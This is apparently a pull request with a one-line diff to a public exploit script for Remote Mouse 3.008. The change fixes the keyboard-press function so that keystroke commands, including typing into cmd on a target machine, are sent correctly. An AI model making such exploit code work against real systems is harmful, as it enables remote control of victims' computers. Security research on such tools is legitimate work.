### PR TITLE
Update RemoteMouse-3.008-Exploit.py

### DIFF
--- a/RemoteMouse-3.008-Exploit.py
+++ b/RemoteMouse-3.008-Exploit.py
@@ -175,7 +175,7 @@ class Keyboard(object):
             self.parent_remotemouse._send_command("key  %sd" % key.value)
         elif type(key) == str:
             if key in self.charset.keys():
-                self.parent_remotemouse._send_command(self.charset[key].value + "d")
+                self.parent_remotemouse._send_command("key  %sd" % self.charset[key].value)
             else:
                 print("Unknown key %s" % bytes(key, 'utf-8'))
 


### PR DESCRIPTION
# ISSUE
The `press` method was not executing properly
> the script was not `typing` any commands (cmd)

# RESOLUTION
- the `key` part of the command was missing